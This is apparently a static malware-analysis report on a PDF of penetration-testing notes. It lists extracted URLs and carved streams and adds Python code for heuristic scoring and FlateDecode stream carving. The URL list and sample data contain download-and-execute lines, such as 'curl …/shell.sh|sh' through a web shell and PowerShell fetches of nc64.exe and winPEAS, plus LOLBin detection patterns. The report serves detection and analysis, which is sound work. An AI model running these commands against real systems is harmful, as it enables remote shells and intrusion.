Malicious PDF — malware analysis report

Static analysis result for SHA-256 01789cc6c0331ba6…

Verdict: MALICIOUS
File type: PDF
Size: 1.05 MB
Created: 2023-03-26 15:28:46 -05:00
Authoring application: Microsoft® Word 2019
First seen: 2023-03-27
MD5: 328b9627c9698d3dd24b4cc99601b6ab
SHA-1: 0fff42794b188d54c33596d762a61846f31d35c9
SHA-256: 01789cc6c0331ba663d6811ad3ddff9db4bf7df9658749a932453959e629cc09
Risk score: 164

Malware Insights

MITRE ATT&CK
  • T1204.002 User Execution: Malicious File
  • T1059.003 Command and Scripting Interpreter: Windows Command Shell
  • T1105 Ingress Tool Transfer

The PDF carries clickable links straight to Windows executables (nc64.exe, winPEASx64.exe, nc.exe) and to shell scripts (linpeas.sh, LinEnum.sh, shell.sh), together with visible download-and-execute command lines (a PowerShell -outfile fetch, "curl … | sh"), which is the profile of a downloader or initial-access lure rather than a document exploit. Text describing a password-protected archive is a common way to keep a payload encrypted past gateway scanning. Taken together the indicators point to a multi-stage chain whose goal is remote access (netcat) followed by local enumeration (winPEAS, linPEAS). Note, however, that the link targets also include HackTheBox lab hosts (.htb, hackthebox.eu), unfilled placeholders (IP, PORT, FUZZ, YOUR_IP_ADDRESS) and public cheat-sheet pages (revshells.com, GTFOBins, PayloadsAllTheThings), a mix consistent with penetration-testing notes exported from Word. The verdict rests on delivery indicators, not on an exploit, so confirm intent by reviewing the carved streams before acting on it.

Machine Learning

  • Nyx PDF Classifier clean score 0.0001

Heuristics (6)

  • PDF_DIRECT_PAYLOAD_LINK (critical): PDF link points directly to an executable/archive payload.
    PDF contains a clickable HTTP(S) URI whose path ends in an executable, script, shortcut, disk image, or archive extension. Documents can legitimately link to installers, so this is a high-risk delivery indicator rather than a standalone exploit fingerprint.
  • SE_LOLBIN_RUN_COMMAND (high): LOLBin token sequence in document text.
    Extracted document text contains a Windows script/execution tool name (PowerShell, mshta, cmd, rundll32, regsvr32, …) within 220 characters of a dangerous flag, command verb, or URL. This is a visible "run this" instruction in HTML/PDF/RTF lure bodies, or, in macro-laden Office files, the macro's own string-pool entries appearing adjacent in extracted text.
  • SE_PASSWORD_ARCHIVE_LURE (high): Password-protected archive handoff.
    Document gives password instructions for an archive or attachment, a technique often used to keep payloads encrypted until after gateway scanning.
  • PDF_URI_IP_LITERAL (medium): Clickable URI points to a raw IP address.
    PDF contains a clickable HTTP(S) action whose host is a literal IPv4 address. Legitimate documents normally link to named domains; raw-IP destinations are common in disposable phishing and malware-delivery infrastructure.
  • PDF_URI (info): External URI.
    PDF contains an external URL action.
  • EMBEDDED_URL (info): Embedded URL.
    One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    • https://github.com/Anonimo501/LFI_diccionarios
    • https://github.com/Anonimo501/Auto_Wordlists_LFI
    • http://unika.htb/index.php?page=//10.10.14.134/algoquenoexista
    • https://www.revshells.com/
    • http://example.htb/shell.php?cmd=curl%20%3CYOUR_IP_ADDRESS%3E:8000/shell.sh|bash
    • http://example.htb/shell.php?cmd=curl%2010.10.14.134:8000/shell.sh|sh
    • https://github.com/int0x33/nc.exe/blob/master/nc64.exe?source=post_page-----a2ddc3557403----------------------
    • http://10.10.15.40/nc64.exe%20-outfile%20nc64.exe
    • http://10.10.14.9/winPEASx64.exe%20-outfile%20winPEASx64.exe
    • https://github.com/Anonimo501/SecLists
    • https://example/
    • https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Reverse%20Shell%20Cheatsheet.md
    • https://gist.github.com/egre55/c058744a4240af6515eb32b2d33fbed3
    • https://github.com/Anonimo501/Linux-Privilege-Escalation-Basics
    • https://github.com/swisskyrepo/PayloadsAllTheThings
    • https://github.com/carlospolop/PEASS-ng
    • https://github.com/IvanGlinkin/AutoSUID
    • https://github.com/sleventyeleven/linuxprivchecker
    • http://IP:Port/nombre-archivo.sh
    • http://SERVER_IP:PORT/FUZZ
    • http://SERVER_IP:PORT/indexFUZZ
    • http://SERVER_IP:PORT/blog/FUZZ.php
    • https://fuzz.hackthebox.eu/
    • https://www.revshells.com
    • http://admin:admin@
    • http://s3.thetoppers.htb
    • https://github.com/int0x33/nc.exe/blob/master/nc64.exe?source=post_page-----a2ddc3557403-------------
    • http://10.10.15.40/nc64.exe
    • http://10.10.14.9/winPEASx64.exe
    • https://github.com/carlospolop/PEASS-
    • https://gist.github.com/egre55/c058744a4240af6515eb32b
    • https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh
    • https://FUZZ.hackthebox.eu/
    • http://academy.htb:PORT/
    • http://admin.academy.htb:PORT/admin/admin.php?FUZZ=key
    • http://admin.academy.htb:PORT/admin/admin.php
    • http://10.10.10.32:443
    • http://10.10.10.32/nc.exe
    • https://raw.githubusercontent.com/rebootuser/LinEnum/master/LinEnum.sh
    • https://raw.githubusercontent.com/juliourena/plaintext/master/Powershell/PSUpload.ps1
    • http://IP-Atacante:8000/upload
    • http://IP-Atacante:8000/
    • http://example.com/
    • http://example.com/shell.php?cmd=whoami
    • https://gtfobins.github.io/
    • http://example.com
    • https://example.com
    • https://www.example.com
    • https://gtfobins.github.io
    • http://www.example.com
    (17 more URLs not shown in this extract)
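The labelled heuristics above can be reproduced with a few regular expressions over the extracted link targets and document text. What follows is an added example written for this page, not the scanner's own rule code: the extension list, the LOLBin names, the "dangerous flag" patterns and the sample URLs and text are assumptions chosen to mirror the heuristic descriptions and the URL shapes listed above (the addresses and commands are placeholders of the same form, not live indicators); only the 220-character window comes from the SE_LOLBIN_RUN_COMMAND description.

```python
import re
from urllib.parse import urlsplit, unquote

# Assumed extension list for PDF_DIRECT_PAYLOAD_LINK (executable, script,
# shortcut, disk image, archive); the vendor's exact list is not published.
PAYLOAD_EXTS = {".exe", ".dll", ".scr", ".msi", ".ps1", ".bat", ".cmd", ".vbs",
                ".js", ".hta", ".lnk", ".iso", ".img", ".vhd", ".zip", ".rar",
                ".7z", ".sh"}
# Assumed LOLBin / fetch-tool names for SE_LOLBIN_RUN_COMMAND.
LOLBINS = ("powershell", "pwsh", "mshta", "cmd", "rundll32", "regsvr32",
           "wscript", "cscript", "certutil", "bitsadmin", "curl", "wget")
LOLBIN_RE = re.compile(r"\b(%s)(?:\.exe)?\b" % "|".join(LOLBINS), re.I)
# "Dangerous flag, command verb, or URL" near the tool name (assumed patterns).
DANGER_RE = re.compile(
    r"(-outfile|-encodedcommand|-enc\b|-w\s+hidden|invoke-\w+|\biex\b|"
    r"https?://|\|\s*(?:sh|bash)\b|/c\s)", re.I)
IPV4_RE = re.compile(r"^\d{1,3}(?:\.\d{1,3}){3}$")
# Password instructions for an archive/attachment, either order, one sentence.
PW_LURE_RE = re.compile(
    r"\b(?:password|contrase[nñ]a)\b[^.\n]{0,120}?\b(?:zip|rar|7z|archive|attachment)\b"
    r"|\b(?:zip|rar|7z|archive|attachment)\b[^.\n]{0,120}?\b(?:password|contrase[nñ]a)\b",
    re.I)
SEVERITY = {"PDF_DIRECT_PAYLOAD_LINK": "critical", "SE_LOLBIN_RUN_COMMAND": "high",
            "SE_PASSWORD_ARCHIVE_LURE": "high", "PDF_URI_IP_LITERAL": "medium",
            "PDF_URI": "info"}


def classify_url(url):
    """Labels for one clickable URI: PDF_URI, PDF_URI_IP_LITERAL, PDF_DIRECT_PAYLOAD_LINK."""
    labels = set()
    try:
        parts = urlsplit(url.strip())
    except ValueError:
        return labels
    if parts.scheme.lower() not in ("http", "https"):
        return labels                      # only HTTP(S) actions count
    labels.add("PDF_URI")
    if IPV4_RE.match(parts.hostname or ""):
        labels.add("PDF_URI_IP_LITERAL")
    # Decode %20 and keep the first token of the last path segment, so
    # "nc64.exe%20-outfile%20nc64.exe" is judged on "nc64.exe".
    tail = unquote(parts.path).rsplit("/", 1)[-1].split()
    first = tail[0] if tail else ""
    if "." in first and "." + first.rsplit(".", 1)[-1].lower() in PAYLOAD_EXTS:
        labels.add("PDF_DIRECT_PAYLOAD_LINK")
    return labels


def lolbin_hits(text, window=220):
    """SE_LOLBIN_RUN_COMMAND: tool names that sit within `window` characters
    of a dangerous flag, verb or URL. Returns the matched names in text order."""
    hits = []
    for m in LOLBIN_RE.finditer(text):
        lo, hi = max(0, m.start() - window), m.end() + window
        if DANGER_RE.search(text[lo:hi]):
            hits.append(m.group(1).lower())
    return hits


def password_lure(text):
    """SE_PASSWORD_ARCHIVE_LURE: password instructions tied to an archive."""
    return bool(PW_LURE_RE.search(text))


def score_document(urls, text):
    """Collapse everything into {label: (severity, count)} like the report."""
    fired = {}
    for url in urls:
        for label in classify_url(url):
            fired[label] = fired.get(label, 0) + 1
    n = len(lolbin_hits(text))
    if n:
        fired["SE_LOLBIN_RUN_COMMAND"] = n
    if password_lure(text):
        fired["SE_PASSWORD_ARCHIVE_LURE"] = 1
    return {label: (SEVERITY[label], count) for label, count in fired.items()}


# Constructed sample data shaped like the report's URLs and lure text.
SAMPLE_URLS = [
    "http://10.10.15.40/nc64.exe%20-outfile%20nc64.exe",
    "https://github.com/int0x33/nc.exe/blob/master/nc64.exe",
    "https://www.revshells.com/",
    "http://example.htb/shell.php?cmd=curl%2010.10.14.134:8000/shell.sh|sh",
    "http://IP:Port/nombre-archivo.sh",
    "https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh",
]
SAMPLE_TEXT = (
    "Descargar nc64.exe en la victima:\n"
    'powershell -c "Invoke-WebRequest http://10.10.15.40/nc64.exe -outfile nc64.exe"\n'
    "Reverse shell desde la web shell: curl 10.10.14.134:8000/shell.sh|sh\n"
    "The archive attached is protected; the password is in the mail body.\n"
)

if __name__ == "__main__":
    for label, (sev, count) in sorted(score_document(SAMPLE_URLS, SAMPLE_TEXT).items()):
        print("%-26s %-8s x%d" % (label, sev, count))
```

The per-URL function is deliberately conservative: an unparseable netloc (the unfilled "IP:Port" placeholder) still yields a payload-link hit because the path is what matters, while a non-HTTP scheme yields nothing, matching the "clickable HTTP(S) action" wording of the heuristics.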

Extracted artifacts (2)

Files carved from inside the sample during analysis.

Filename: stream_023_off0005cc84.bin
SHA-256: 369f0e1f60d510718703d470284643c3cbba43a5e6db8398ec3b000826b679ed
Kind: decompressed-pdf-stream
Source: PDF FlateDecoded stream at offset 0x5CC84
Size: 1,809,522 bytes

Filename: stream_033_off000cd5e8.bin
SHA-256: c1f3a521b298a0b8d92a22e36129fbc71675de9c462615b1111151634f674201
Kind: decompressed-pdf-stream
Source: PDF FlateDecoded stream at offset 0xCD5E8
Size: 175,564 bytes
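Carving FlateDecode streams the way the two artifacts above were produced, and labelling which channel each URL was reached through, as an added example that is not the analysis platform's code. It builds a minimal constructed PDF inline (one compressed content stream and one /Link annotation; there is no xref table, so a viewer will reject it, but byte-level carving behaves exactly as on a real file), inflates every /FlateDecode stream with zlib, and records offset, raw and decompressed size and SHA-256 per stream. The report does not say whether its offsets point at the stream keyword or at the first compressed byte; this example assumes the latter. The sample URL is a placeholder of the same shape as the report's, not a live indicator.

```python
import hashlib
import re
import zlib

# Constructed sample page content (a text-showing operator with a URL in it).
CONTENT = b"BT /F1 12 Tf 72 720 Td (Descargar http://10.10.15.40/nc64.exe) Tj ET"


def build_sample_pdf():
    """Minimal constructed PDF: objects only, no xref, one Flate stream, one /URI."""
    comp = zlib.compress(CONTENT)
    objs = [
        b"<< /Type /Catalog /Pages 2 0 R >>",
        b"<< /Type /Pages /Kids [3 0 R] /Count 1 >>",
        b"<< /Type /Page /Parent 2 0 R /Contents 4 0 R /Annots [5 0 R] >>",
        b"<< /Length %d /Filter /FlateDecode >>\nstream\n" % len(comp)
        + comp + b"\nendstream",
        b"<< /Type /Annot /Subtype /Link /Rect [72 700 300 730] "
        b"/A << /S /URI /URI (http://10.10.15.40/nc64.exe%20-outfile%20nc64.exe) >> >>",
    ]
    pdf = b"%PDF-1.4\n"
    for num, body in enumerate(objs, 1):
        pdf += b"%d 0 obj\n" % num + body + b"\nendobj\n"
    return pdf + b"trailer\n<< /Root 1 0 R >>\n%%EOF\n"


STREAM_RE = re.compile(rb"(?<!end)stream\r?\n")        # skip the "endstream" keyword
LENGTH_RE = re.compile(rb"/Length\s+(\d+)(?![\s\d]*R)")  # direct /Length only, not "n 0 R"
URI_RE = re.compile(rb"/URI\s*\(((?:\\.|[^\\)])*)\)")    # /URI (...) action string
BODY_URL_RE = re.compile(rb"https?://[^\s()<>]+")        # bare URL in page text


def carve_flate_streams(pdf):
    """Every /FlateDecode stream: offset of its first compressed byte, raw length,
    decompressed length and SHA-256 of the decompressed bytes (plus the bytes)."""
    found = []
    for m in STREAM_RE.finditer(pdf):
        start = m.end()
        obj_pos = pdf.rfind(b" obj", 0, m.start())
        if obj_pos < 0:
            continue
        sdict = pdf[obj_pos:m.start()]                   # the stream dictionary
        if b"/FlateDecode" not in sdict:
            continue
        end = pdf.find(b"endstream", start)
        if end < 0:
            continue
        lm = LENGTH_RE.search(sdict)
        raw = pdf[start:start + int(lm.group(1))] if lm else pdf[start:end]
        d = zlib.decompressobj()                         # tolerates trailing EOL bytes
        try:
            plain = d.decompress(raw) + d.flush()
        except zlib.error as exc:                        # corrupt or non-zlib data
            found.append({"offset": start, "raw_len": len(raw), "error": str(exc)})
            continue
        found.append({"offset": start, "raw_len": len(raw), "len": len(plain),
                      "sha256": hashlib.sha256(plain).hexdigest(), "data": plain})
    return found


def extract_uris(pdf, streams):
    """Map each URL to the channel(s) that reached it, like the report's per-URL
    labels: 'link-annotation' for /URI actions in the raw file or a decompressed
    stream, 'document-body@0x...' for bare URLs inside decompressed page text."""
    uris = {}
    for m in URI_RE.finditer(pdf):
        uris.setdefault(m.group(1).decode("latin-1"), set()).add("link-annotation")
    for s in streams:
        data = s.get("data", b"")
        tag = "0x%x" % s["offset"]
        for m in URI_RE.finditer(data):
            uris.setdefault(m.group(1).decode("latin-1"), set()).add("link-annotation@" + tag)
        for m in BODY_URL_RE.finditer(data):
            uris.setdefault(m.group(0).decode("latin-1"), set()).add("document-body@" + tag)
    return uris


if __name__ == "__main__":
    sample = build_sample_pdf()
    streams = carve_flate_streams(sample)
    for s in streams:
        print("stream at 0x%05X: %d raw -> %s bytes, %s"
              % (s["offset"], s["raw_len"], s.get("len"), s.get("sha256", s.get("error"))))
    for url, channels in sorted(extract_uris(sample, streams).items()):
        print(url, sorted(channels))
```

On a real file the same loop also yields object streams and embedded files; anything that inflates to far more than its raw size (the first artifact above is 1.8 MB out of a 1.05 MB PDF) is worth a closer look, and each carved buffer should be hashed and kept, as the report does, so the URL and command-line evidence can be tied back to a specific stream.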